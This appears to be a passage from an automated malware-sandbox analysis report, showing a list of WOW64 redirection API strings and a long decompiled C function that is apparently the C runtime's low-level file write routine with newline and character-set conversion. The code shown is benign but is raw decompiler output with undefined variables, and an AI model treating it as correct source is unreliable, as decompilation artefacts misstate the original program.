                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                  • API String ID: 2124981135-499589564
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E0042D94A(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v15;
                                                                                                                                                                  				void _v16;
                                                                                                                                                                  				short _v1724;
                                                                                                                                                                  				char _v5140;
                                                                                                                                                                  				void _v6844;
                                                                                                                                                                  				void* _v6848;
                                                                                                                                                                  				signed int _v6852;
                                                                                                                                                                  				short _v6856;
                                                                                                                                                                  				signed int _v6860;
                                                                                                                                                                  				signed int _v6864;
                                                                                                                                                                  				signed int _v6868;
                                                                                                                                                                  				char _v6872;
                                                                                                                                                                  				long _v6876;
                                                                                                                                                                  				long _v6880;
                                                                                                                                                                  				char _v6881;
                                                                                                                                                                  				long _v6888;
                                                                                                                                                                  				intOrPtr _v6892;
                                                                                                                                                                  				signed int _v6896;
                                                                                                                                                                  				int _v6900;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				signed int _t252;
                                                                                                                                                                  				signed int _t254;
                                                                                                                                                                  				signed char _t256;
                                                                                                                                                                  				signed int _t257;
                                                                                                                                                                  				intOrPtr _t259;
                                                                                                                                                                  				signed int _t260;
                                                                                                                                                                  				signed int _t262;
                                                                                                                                                                  				intOrPtr _t265;
                                                                                                                                                                  				signed int _t267;
                                                                                                                                                                  				signed int* _t269;
                                                                                                                                                                  				signed int _t274;
                                                                                                                                                                  				signed int _t280;
                                                                                                                                                                  				signed int _t281;
                                                                                                                                                                  				signed int _t282;
                                                                                                                                                                  				signed int _t284;
                                                                                                                                                                  				signed int _t290;
                                                                                                                                                                  				short _t293;
                                                                                                                                                                  				signed int _t294;
                                                                                                                                                                  				signed int _t300;
                                                                                                                                                                  				intOrPtr _t304;
                                                                                                                                                                  				void* _t305;
                                                                                                                                                                  				signed int _t310;
                                                                                                                                                                  				int _t311;
                                                                                                                                                                  				short _t313;
                                                                                                                                                                  				signed int _t315;
                                                                                                                                                                  				void* _t316;
                                                                                                                                                                  				signed int _t321;
                                                                                                                                                                  				void* _t323;
                                                                                                                                                                  				signed int _t324;
                                                                                                                                                                  				long _t328;
                                                                                                                                                                  				signed int _t332;
                                                                                                                                                                  				signed int _t338;
                                                                                                                                                                  				void* _t345;
                                                                                                                                                                  				short _t349;
                                                                                                                                                                  				void* _t350;
                                                                                                                                                                  				signed char _t360;
                                                                                                                                                                  				signed int _t362;
                                                                                                                                                                  				signed int _t363;
                                                                                                                                                                  				signed int* _t364;
                                                                                                                                                                  				long _t365;
                                                                                                                                                                  				char* _t366;
                                                                                                                                                                  				long _t367;
                                                                                                                                                                  				signed int _t368;
                                                                                                                                                                  				signed int _t369;
                                                                                                                                                                  				signed int _t371;
                                                                                                                                                                  				intOrPtr _t372;
                                                                                                                                                                  				signed int _t377;
                                                                                                                                                                  				short _t379;
                                                                                                                                                                  				signed int _t380;
                                                                                                                                                                  				signed int _t383;
                                                                                                                                                                  				signed int _t385;
                                                                                                                                                                  				signed int _t388;
                                                                                                                                                                  				char _t391;
                                                                                                                                                                  				signed int _t392;
                                                                                                                                                                  				signed int _t393;
                                                                                                                                                                  				signed short* _t396;
                                                                                                                                                                  				void* _t397;
                                                                                                                                                                  				char _t398;
                                                                                                                                                                  				short _t405;
                                                                                                                                                                  				signed int _t406;
                                                                                                                                                                  				signed int _t408;
                                                                                                                                                                  				short _t409;
                                                                                                                                                                  				intOrPtr _t414;
                                                                                                                                                                  				intOrPtr* _t415;
                                                                                                                                                                  				signed int _t416;
                                                                                                                                                                  				signed int _t418;
                                                                                                                                                                  				char _t419;
                                                                                                                                                                  				signed int _t424;
                                                                                                                                                                  				signed int _t425;
                                                                                                                                                                  				signed short* _t426;
                                                                                                                                                                  				signed int _t428;
                                                                                                                                                                  				signed int _t429;
                                                                                                                                                                  				signed int _t430;
                                                                                                                                                                  				void* _t431;
                                                                                                                                                                  
                                                                                                                                                                  				_t421 = __esi;
                                                                                                                                                                  				E0042F730(0x1af0);
                                                                                                                                                                  				_t252 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t252 ^ _t430;
                                                                                                                                                                  				_t254 = _a4;
                                                                                                                                                                  				_t369 = _a8;
                                                                                                                                                                  				_t416 = 0;
                                                                                                                                                                  				_v6852 = _t254;
                                                                                                                                                                  				_v6848 = _t369;
                                                                                                                                                                  				_v6856 = 0;
                                                                                                                                                                  				_v6872 = 0;
                                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                                  					__eflags = _t369;
                                                                                                                                                                  					if(_t369 != 0) {
                                                                                                                                                                  						_push(__esi);
                                                                                                                                                                  						_t371 = _t254 >> 5;
                                                                                                                                                                  						_t424 = (_t254 & 0x0000001f) << 6;
                                                                                                                                                                  						_v6868 = _t371;
                                                                                                                                                                  						_t372 =  *((intOrPtr*)(0x457610 + _t371 * 4));
                                                                                                                                                                  						_v6896 = _t424;
                                                                                                                                                                  						_t360 =  *((intOrPtr*)(_t424 + _t372 + 0x24)) +  *((intOrPtr*)(_t424 + _t372 + 0x24)) >> 1;
                                                                                                                                                                  						__eflags = _t360 - 2;
                                                                                                                                                                  						if(_t360 == 2) {
                                                                                                                                                                  							L6:
                                                                                                                                                                  							_t256 =  !_a12;
                                                                                                                                                                  							__eflags = _t256 & 0x00000001;
                                                                                                                                                                  							if((_t256 & 0x00000001) != 0) {
                                                                                                                                                                  								_t254 = _v6852;
                                                                                                                                                                  								L9:
                                                                                                                                                                  								__eflags =  *(_t424 + _t372 + 4) & 0x00000020;
                                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                                  									E0042E270(_t372, __eflags, _t254, 0, 0, 2);
                                                                                                                                                                  									_t431 = _t431 + 0x10;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t257 = E0042D814(_v6852);
                                                                                                                                                                  								__eflags = _t257;
                                                                                                                                                                  								if(_t257 == 0) {
                                                                                                                                                                  									L50:
                                                                                                                                                                  									_t259 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
                                                                                                                                                                  									__eflags =  *(_t424 + _t259 + 4) & 0x00000080;
                                                                                                                                                                  									if(( *(_t424 + _t259 + 4) & 0x00000080) == 0) {
                                                                                                                                                                  										_t260 = WriteFile( *(_t424 + _t259), _v6848, _a12,  &_v6876, 0);
                                                                                                                                                                  										__eflags = _t260;
                                                                                                                                                                  										if(_t260 == 0) {
                                                                                                                                                                  											goto L92;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t416 = _v6876;
                                                                                                                                                                  										_t425 = 0;
                                                                                                                                                                  										goto L93;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t405 = _v6848;
                                                                                                                                                                  									_t425 = 0;
                                                                                                                                                                  									_v6860 = 0;
                                                                                                                                                                  									__eflags = _t360;
                                                                                                                                                                  									if(_t360 != 0) {
                                                                                                                                                                  										_t379 = _t405;
                                                                                                                                                                  										__eflags = _t360 - 2;
                                                                                                                                                                  										if(_t360 != 2) {
                                                                                                                                                                  											_t363 = _a12;
                                                                                                                                                                  											_v6880 = _t379;
                                                                                                                                                                  											__eflags = _t363;
                                                                                                                                                                  											if(_t363 == 0) {
                                                                                                                                                                  												goto L99;
                                                                                                                                                                  											}
                                                                                                                                                                  											_v6892 = 0xa;
                                                                                                                                                                  											do {
                                                                                                                                                                  												_v6888 = _v6888 & 0x00000000;
                                                                                                                                                                  												_t426 = _v6880;
                                                                                                                                                                  												_t380 = _t379 - _t405;
                                                                                                                                                                  												__eflags = _t380;
                                                                                                                                                                  												_t406 = _v6888;
                                                                                                                                                                  												_t269 =  &_v1724;
                                                                                                                                                                  												do {
                                                                                                                                                                  													__eflags = _t380 - _t363;
                                                                                                                                                                  													if(_t380 >= _t363) {
                                                                                                                                                                  														break;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t418 =  *_t426 & 0x0000ffff;
                                                                                                                                                                  													_t426 =  &(_t426[1]);
                                                                                                                                                                  													_t380 = _t380 + 2;
                                                                                                                                                                  													_v6880 = _t426;
                                                                                                                                                                  													__eflags = _t418 - _v6892;
                                                                                                                                                                  													if(_t418 == _v6892) {
                                                                                                                                                                  														_t428 = 0xd;
                                                                                                                                                                  														 *_t269 = _t428;
                                                                                                                                                                  														_t426 = _v6880;
                                                                                                                                                                  														_t269 =  &(_t269[0]);
                                                                                                                                                                  														_t406 = _t406 + 2;
                                                                                                                                                                  														__eflags = _t406;
                                                                                                                                                                  													}
                                                                                                                                                                  													 *_t269 = _t418;
                                                                                                                                                                  													_t406 = _t406 + 2;
                                                                                                                                                                  													_t269 =  &(_t269[0]);
                                                                                                                                                                  													__eflags = _t406 - 0x6a8;
                                                                                                                                                                  												} while (_t406 < 0x6a8);
                                                                                                                                                                  												asm("cdq");
                                                                                                                                                                  												_t274 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t269 -  &_v1724 - _t406 >> 1,  &_v5140, 0xd55, 0, 0);
                                                                                                                                                                  												_t425 = _v6860;
                                                                                                                                                                  												_t416 = _v6856;
                                                                                                                                                                  												_v6864 = _t274;
                                                                                                                                                                  												__eflags = _t274;
                                                                                                                                                                  												if(_t274 == 0) {
                                                                                                                                                                  													goto L92;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t383 = 0;
                                                                                                                                                                  												__eflags = 0;
                                                                                                                                                                  												_v6852 = 0;
                                                                                                                                                                  												while(1) {
                                                                                                                                                                  													_t280 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &(( &_v5140)[_t383]), _t274 - _t383,  &_v6876, 0);
                                                                                                                                                                  													__eflags = _t280;
                                                                                                                                                                  													if(_t280 == 0) {
                                                                                                                                                                  														break;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t383 = _v6852 + _v6876;
                                                                                                                                                                  													_t274 = _v6864;
                                                                                                                                                                  													_v6852 = _t383;
                                                                                                                                                                  													__eflags = _t274 - _t383;
                                                                                                                                                                  													if(_t274 > _t383) {
                                                                                                                                                                  														continue;
                                                                                                                                                                  													}
                                                                                                                                                                  													L87:
                                                                                                                                                                  													__eflags = _t282 - _t385;
                                                                                                                                                                  													if(_t282 > _t385) {
                                                                                                                                                                  														goto L93;
                                                                                                                                                                  													}
                                                                                                                                                                  													goto L88;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t281 = GetLastError();
                                                                                                                                                                  												_t385 = _v6852;
                                                                                                                                                                  												_t425 = _t281;
                                                                                                                                                                  												_t282 = _v6864;
                                                                                                                                                                  												_v6860 = _t425;
                                                                                                                                                                  												goto L87;
                                                                                                                                                                  												L88:
                                                                                                                                                                  												_t379 = _v6880;
                                                                                                                                                                  												_t405 = _v6848;
                                                                                                                                                                  												_t416 = _t379 - _t405;
                                                                                                                                                                  												_v6856 = _t416;
                                                                                                                                                                  												__eflags = _t416 - _t363;
                                                                                                                                                                  											} while (_t416 < _t363);
                                                                                                                                                                  											goto L94;
                                                                                                                                                                  										}
                                                                                                                                                                  										_v6852 = _t379;
                                                                                                                                                                  										__eflags = _a12;
                                                                                                                                                                  										if(_a12 <= 0) {
                                                                                                                                                                  											goto L99;
                                                                                                                                                                  										}
                                                                                                                                                                  										_v6892 = 0xa;
                                                                                                                                                                  										do {
                                                                                                                                                                  											_v6888 = _v6888 & 0x00000000;
                                                                                                                                                                  											_t419 = _v6872;
                                                                                                                                                                  											_t284 = _t379 - _t405;
                                                                                                                                                                  											__eflags = _t284;
                                                                                                                                                                  											_t408 = _v6888;
                                                                                                                                                                  											_t364 =  &_v6844;
                                                                                                                                                                  											do {
                                                                                                                                                                  												__eflags = _t284 - _a12;
                                                                                                                                                                  												if(_t284 >= _a12) {
                                                                                                                                                                  													break;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t429 =  *_t379 & 0x0000ffff;
                                                                                                                                                                  												_t379 = _t379 + 2;
                                                                                                                                                                  												_t284 = _t284 + 2;
                                                                                                                                                                  												_v6852 = _t379;
                                                                                                                                                                  												__eflags = _t429 - _v6892;
                                                                                                                                                                  												if(_t429 == _v6892) {
                                                                                                                                                                  													_t388 = 0xd;
                                                                                                                                                                  													 *_t364 = _t388;
                                                                                                                                                                  													_t379 = _v6852;
                                                                                                                                                                  													_t419 = _t419 + 2;
                                                                                                                                                                  													_t364 =  &(_t364[0]);
                                                                                                                                                                  													_t408 = _t408 + 2;
                                                                                                                                                                  													__eflags = _t408;
                                                                                                                                                                  												}
                                                                                                                                                                  												 *_t364 = _t429;
                                                                                                                                                                  												_t408 = _t408 + 2;
                                                                                                                                                                  												_t364 =  &(_t364[0]);
                                                                                                                                                                  												__eflags = _t408 - 0x13fe;
                                                                                                                                                                  											} while (_t408 < 0x13fe);
                                                                                                                                                                  											_t365 = _t364 -  &_v6844;
                                                                                                                                                                  											_v6872 = _t419;
                                                                                                                                                                  											_t290 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v6844, _t365,  &_v6876, 0);
                                                                                                                                                                  											_t425 = _v6860;
                                                                                                                                                                  											_t416 = _v6856;
                                                                                                                                                                  											__eflags = _t290;
                                                                                                                                                                  											if(_t290 == 0) {
                                                                                                                                                                  												goto L92;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t416 = _t416 + _v6876;
                                                                                                                                                                  											_t405 = _v6848;
                                                                                                                                                                  											_v6856 = _t416;
                                                                                                                                                                  											__eflags = _v6876 - _t365;
                                                                                                                                                                  											if(_v6876 < _t365) {
                                                                                                                                                                  												goto L94;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t379 = _v6852;
                                                                                                                                                                  											__eflags = _t379 - _t405 - _a12;
                                                                                                                                                                  										} while (_t379 - _t405 < _a12);
                                                                                                                                                                  										goto L94;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t293 = _t405;
                                                                                                                                                                  									_v6856 = _t293;
                                                                                                                                                                  									__eflags = _a12;
                                                                                                                                                                  									if(_a12 <= 0) {
                                                                                                                                                                  										goto L99;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										goto L53;
                                                                                                                                                                  									}
                                                                                                                                                                  									do {
                                                                                                                                                                  										L53:
                                                                                                                                                                  										_t294 = _t293 - _t405;
                                                                                                                                                                  										__eflags = _t294;
                                                                                                                                                                  										_t409 = _v6856;
                                                                                                                                                                  										_t366 =  &_v6844;
                                                                                                                                                                  										_v6852 = 0;
                                                                                                                                                                  										do {
                                                                                                                                                                  											__eflags = _t294 - _a12;
                                                                                                                                                                  											if(_t294 >= _a12) {
                                                                                                                                                                  												break;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t391 =  *_t409;
                                                                                                                                                                  											_t294 = _t294 + 1;
                                                                                                                                                                  											_v6881 = _t391;
                                                                                                                                                                  											__eflags = _t391 - 0xa;
                                                                                                                                                                  											_t392 = _v6852;
                                                                                                                                                                  											_v6856 = _t409 + 1;
                                                                                                                                                                  											if(_t391 == 0xa) {
                                                                                                                                                                  												_v6872 = _v6872 + 1;
                                                                                                                                                                  												 *_t366 = 0xd;
                                                                                                                                                                  												_t366 = _t366 + 1;
                                                                                                                                                                  												_t392 = _t392 + 1;
                                                                                                                                                                  												__eflags = _t392;
                                                                                                                                                                  											}
                                                                                                                                                                  											 *_t366 = _v6881;
                                                                                                                                                                  											_t409 = _v6856;
                                                                                                                                                                  											_t366 = _t366 + 1;
                                                                                                                                                                  											_t393 = _t392 + 1;
                                                                                                                                                                  											_v6852 = _t393;
                                                                                                                                                                  											__eflags = _t393 - 0x13ff;
                                                                                                                                                                  										} while (_t393 < 0x13ff);
                                                                                                                                                                  										_t367 = _t366 -  &_v6844;
                                                                                                                                                                  										_t300 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v6844, _t367,  &_v6876, 0);
                                                                                                                                                                  										__eflags = _t300;
                                                                                                                                                                  										if(_t300 == 0) {
                                                                                                                                                                  											goto L92;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t416 = _t416 + _v6876;
                                                                                                                                                                  										_t405 = _v6848;
                                                                                                                                                                  										__eflags = _v6876 - _t367;
                                                                                                                                                                  										if(_v6876 < _t367) {
                                                                                                                                                                  											goto L94;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _v6856 - _t405 - _a12;
                                                                                                                                                                  										_t293 = _v6856;
                                                                                                                                                                  									} while (_v6856 - _t405 < _a12);
                                                                                                                                                                  									goto L94;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t304 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
                                                                                                                                                                  									__eflags =  *(_t424 + _t304 + 4) & 0x00000080;
                                                                                                                                                                  									if(( *(_t424 + _t304 + 4) & 0x00000080) == 0) {
                                                                                                                                                                  										goto L50;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t305 = E00429471();
                                                                                                                                                                  									__eflags =  *( *((intOrPtr*)(_t305 + 0x6c)) + 0xa8);
                                                                                                                                                                  									_v6852 = 0 |  *( *((intOrPtr*)(_t305 + 0x6c)) + 0xa8) == 0x00000000;
                                                                                                                                                                  									_t310 = GetConsoleMode( *(_t424 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v6888);
                                                                                                                                                                  									__eflags = _t310;
                                                                                                                                                                  									if(_t310 == 0) {
                                                                                                                                                                  										goto L50;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _v6852 - _t416;
                                                                                                                                                                  									if(_v6852 == _t416) {
                                                                                                                                                                  										L16:
                                                                                                                                                                  										_t311 = GetConsoleCP();
                                                                                                                                                                  										_t405 = _v6848;
                                                                                                                                                                  										_v6880 = _v6880 & _t416;
                                                                                                                                                                  										_t396 = _t405;
                                                                                                                                                                  										_v6900 = _t311;
                                                                                                                                                                  										_v6864 = _t396;
                                                                                                                                                                  										__eflags = _a12 - _t416;
                                                                                                                                                                  										if(_a12 <= _t416) {
                                                                                                                                                                  											_t425 = _v6852;
                                                                                                                                                                  											L95:
                                                                                                                                                                  											__eflags = _t425;
                                                                                                                                                                  											if(_t425 == 0) {
                                                                                                                                                                  												L99:
                                                                                                                                                                  												_t377 = _v6896;
                                                                                                                                                                  												_t265 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
                                                                                                                                                                  												__eflags =  *(_t377 + _t265 + 4) & 0x00000040;
                                                                                                                                                                  												if(( *(_t377 + _t265 + 4) & 0x00000040) == 0) {
                                                                                                                                                                  													L102:
                                                                                                                                                                  													 *((intOrPtr*)(E0042AD46())) = 0x1c;
                                                                                                                                                                  													_t267 = E0042AD12();
                                                                                                                                                                  													 *_t267 =  *_t267 & 0x00000000;
                                                                                                                                                                  													__eflags =  *_t267;
                                                                                                                                                                  													L103:
                                                                                                                                                                  													_t262 = _t267 | 0xffffffff;
                                                                                                                                                                  													L105:
                                                                                                                                                                  													_pop(_t421);
                                                                                                                                                                  													L106:
                                                                                                                                                                  													return L004267AF(_t262, _v8 ^ _t430, _t416, _t421);
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags =  *_t405 - 0x1a;
                                                                                                                                                                  												if( *_t405 != 0x1a) {
                                                                                                                                                                  													goto L102;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t262 = 0;
                                                                                                                                                                  												goto L105;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t362 = 5;
                                                                                                                                                                  											__eflags = _t425 - _t362;
                                                                                                                                                                  											if(_t425 != _t362) {
                                                                                                                                                                  												_t267 = E0042AD25(_t425);
                                                                                                                                                                  											} else {
                                                                                                                                                                  												 *((intOrPtr*)(E0042AD46())) = 9;
                                                                                                                                                                  												_t267 = E0042AD12();
                                                                                                                                                                  												 *_t267 = _t362;
                                                                                                                                                                  											}
                                                                                                                                                                  											goto L103;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = 0;
                                                                                                                                                                  										_v6860 = 0;
                                                                                                                                                                  										_v6892 = 0xa;
                                                                                                                                                                  										do {
                                                                                                                                                                  											__eflags = _t360;
                                                                                                                                                                  											if(_t360 != 0) {
                                                                                                                                                                  												__eflags = _t360 - 1;
                                                                                                                                                                  												if(_t360 == 1) {
                                                                                                                                                                  													L37:
                                                                                                                                                                  													_t313 =  *_t396 & 0x0000ffff;
                                                                                                                                                                  													__eflags = _t313 - _v6892;
                                                                                                                                                                  													_v6856 = _t313;
                                                                                                                                                                  													_t396 =  &(_t396[1]);
                                                                                                                                                                  													_t315 = _v6860 + 2;
                                                                                                                                                                  													__eflags = _t315;
                                                                                                                                                                  													_v6864 = _t396;
                                                                                                                                                                  													_v6860 = _t315;
                                                                                                                                                                  													_v6852 = 0 | _t313 == _v6892;
                                                                                                                                                                  													L38:
                                                                                                                                                                  													__eflags = _t360 - 1;
                                                                                                                                                                  													if(_t360 == 1) {
                                                                                                                                                                  														L40:
                                                                                                                                                                  														_t316 = E0042F6EE(_t396, _v6856);
                                                                                                                                                                  														_pop(_t397);
                                                                                                                                                                  														__eflags = _t316 - _v6856;
                                                                                                                                                                  														if(_t316 != _v6856) {
                                                                                                                                                                  															L92:
                                                                                                                                                                  															_t425 = GetLastError();
                                                                                                                                                                  															L93:
                                                                                                                                                                  															_t405 = _v6848;
                                                                                                                                                                  															L94:
                                                                                                                                                                  															__eflags = _t416;
                                                                                                                                                                  															if(_t416 != 0) {
                                                                                                                                                                  																_t416 = _t416 - _v6872;
                                                                                                                                                                  																__eflags = _t416;
                                                                                                                                                                  																_t262 = _t416;
                                                                                                                                                                  																goto L105;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L95;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t416 = _t416 + 2;
                                                                                                                                                                  														__eflags = _v6852;
                                                                                                                                                                  														if(_v6852 == 0) {
                                                                                                                                                                  															L44:
                                                                                                                                                                  															_t315 = _v6860;
                                                                                                                                                                  															_t396 = _v6864;
                                                                                                                                                                  															goto L45;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t349 = 0xd;
                                                                                                                                                                  														_v6856 = _t349;
                                                                                                                                                                  														_t350 = E0042F6EE(_t397, _t349);
                                                                                                                                                                  														__eflags = _t350 - _v6856;
                                                                                                                                                                  														if(_t350 != _v6856) {
                                                                                                                                                                  															goto L92;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t416 = _t416 + 1;
                                                                                                                                                                  														_t118 =  &_v6872;
                                                                                                                                                                  														 *_t118 = _v6872 + 1;
                                                                                                                                                                  														__eflags =  *_t118;
                                                                                                                                                                  														goto L44;
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _t360 - 2;
                                                                                                                                                                  													if(_t360 != 2) {
                                                                                                                                                                  														goto L45;
                                                                                                                                                                  													}
                                                                                                                                                                  													goto L40;
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags = _t360 - 2;
                                                                                                                                                                  												if(_t360 != 2) {
                                                                                                                                                                  													goto L38;
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L37;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t398 =  *_t396;
                                                                                                                                                                  											__eflags = _t398 - 0xa;
                                                                                                                                                                  											_v6852 = 0 | _t398 == 0x0000000a;
                                                                                                                                                                  											_t414 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
                                                                                                                                                                  											__eflags =  *(_t424 + _t414 + 0x38);
                                                                                                                                                                  											if( *(_t424 + _t414 + 0x38) == 0) {
                                                                                                                                                                  												_t321 = E0042E35D(_t398);
                                                                                                                                                                  												__eflags = _t321;
                                                                                                                                                                  												if(_t321 == 0) {
                                                                                                                                                                  													_push(1);
                                                                                                                                                                  													_push(_v6864);
                                                                                                                                                                  													L26:
                                                                                                                                                                  													_push( &_v6856);
                                                                                                                                                                  													_t323 = E0042F6D6();
                                                                                                                                                                  													_t431 = _t431 + 0xc;
                                                                                                                                                                  													__eflags = _t323 - 0xffffffff;
                                                                                                                                                                  													if(_t323 == 0xffffffff) {
                                                                                                                                                                  														L48:
                                                                                                                                                                  														_t425 = _v6852;
                                                                                                                                                                  														goto L93;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t324 = _v6864;
                                                                                                                                                                  													L28:
                                                                                                                                                                  													_v6860 = _v6860 + 1;
                                                                                                                                                                  													_v6864 = _t324 + 1;
                                                                                                                                                                  													_t328 = WideCharToMultiByte(_v6900, 0,  &_v6856, 1,  &_v16, 5, 0, 0);
                                                                                                                                                                  													_v6888 = _t328;
                                                                                                                                                                  													__eflags = _t328;
                                                                                                                                                                  													if(_t328 == 0) {
                                                                                                                                                                  														goto L48;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t332 = WriteFile( *(_t424 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v16, _t328,  &_v6880, 0);
                                                                                                                                                                  													__eflags = _t332;
                                                                                                                                                                  													if(_t332 == 0) {
                                                                                                                                                                  														goto L92;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t416 = _v6860 + _v6872;
                                                                                                                                                                  													__eflags = _v6880 - _v6888;
                                                                                                                                                                  													if(_v6880 < _v6888) {
                                                                                                                                                                  														goto L48;
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v6852;
                                                                                                                                                                  													if(_v6852 == 0) {
                                                                                                                                                                  														goto L44;
                                                                                                                                                                  													}
                                                                                                                                                                  													_v16 = 0xd;
                                                                                                                                                                  													_t338 = WriteFile( *(_t424 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v16, 1,  &_v6880, 0);
                                                                                                                                                                  													__eflags = _t338;
                                                                                                                                                                  													if(_t338 == 0) {
                                                                                                                                                                  														goto L92;
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v6880 - 1;
                                                                                                                                                                  													if(_v6880 < 1) {
                                                                                                                                                                  														goto L48;
                                                                                                                                                                  													}
                                                                                                                                                                  													_v6872 = _v6872 + 1;
                                                                                                                                                                  													_t416 = _t416 + 1;
                                                                                                                                                                  													goto L44;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t415 = _v6864;
                                                                                                                                                                  												__eflags = _v6848 - _t415 + _a12 - 1;
                                                                                                                                                                  												if(_v6848 - _t415 + _a12 <= 1) {
                                                                                                                                                                  													_t368 = _v6868;
                                                                                                                                                                  													_t416 = _t416 + 1;
                                                                                                                                                                  													__eflags = _t416;
                                                                                                                                                                  													 *((char*)(_t424 +  *((intOrPtr*)(0x457610 + _t368 * 4)) + 0x34)) =  *_t415;
                                                                                                                                                                  													 *(_t424 +  *((intOrPtr*)(0x457610 + _t368 * 4)) + 0x38) = 1;
                                                                                                                                                                  													goto L48;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t345 = E0042F6D6( &_v6856, _t415, 2);
                                                                                                                                                                  												_t431 = _t431 + 0xc;
                                                                                                                                                                  												__eflags = _t345 - 0xffffffff;
                                                                                                                                                                  												if(_t345 == 0xffffffff) {
                                                                                                                                                                  													goto L48;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t324 = _v6864 + 1;
                                                                                                                                                                  												_v6860 = _v6860 + 1;
                                                                                                                                                                  												goto L28;
                                                                                                                                                                  											}
                                                                                                                                                                  											_v16 =  *((intOrPtr*)(_t424 + _t414 + 0x34));
                                                                                                                                                                  											_push(2);
                                                                                                                                                                  											_v15 = _t398;
                                                                                                                                                                  											 *(_t424 + _t414 + 0x38) =  *(_t424 + _t414 + 0x38) & 0x00000000;
                                                                                                                                                                  											_push( &_v16);
                                                                                                                                                                  											goto L26;
                                                                                                                                                                  											L45:
                                                                                                                                                                  											__eflags = _t315 - _a12;
                                                                                                                                                                  										} while (_t315 < _a12);
                                                                                                                                                                  										goto L48;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t360;
                                                                                                                                                                  									if(_t360 == 0) {
                                                                                                                                                                  										goto L50;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L16;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							 *(E0042AD12()) =  *_t352 & _t416;
                                                                                                                                                                  							 *((intOrPtr*)(E0042AD46())) = 0x16;
                                                                                                                                                                  							_t267 = E0042ACD7();
                                                                                                                                                                  							goto L103;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _t360 - 1;
                                                                                                                                                                  						if(_t360 != 1) {
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *(E0042AD12()) =  *_t354 & 0;
                                                                                                                                                                  					 *((intOrPtr*)(E0042AD46())) = 0x16;
                                                                                                                                                                  					_t262 = E0042ACD7() | 0xffffffff;
                                                                                                                                                                  					goto L106;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t262 = 0;
                                                                                                                                                                  				goto L106;
                                                                                                                                                                  			}

                                                                                                                                                                  0x0042da17
                                                                                                                                                                  0x0042da1e
                                                                                                                                                                  0x0042da23
                                                                                                                                                                  0x0042da23
                                                                                                                                                                  0x0042da2c
                                                                                                                                                                  0x0042da32
                                                                                                                                                                  0x0042da34
                                                                                                                                                                  0x0042dd52
                                                                                                                                                                  0x0042dd58
                                                                                                                                                                  0x0042dd5f
                                                                                                                                                                  0x0042dd64
                                                                                                                                                                  0x0042e0d4
                                                                                                                                                                  0x0042e0da
                                                                                                                                                                  0x0042e0dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0de
                                                                                                                                                                  0x0042e0e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0e4
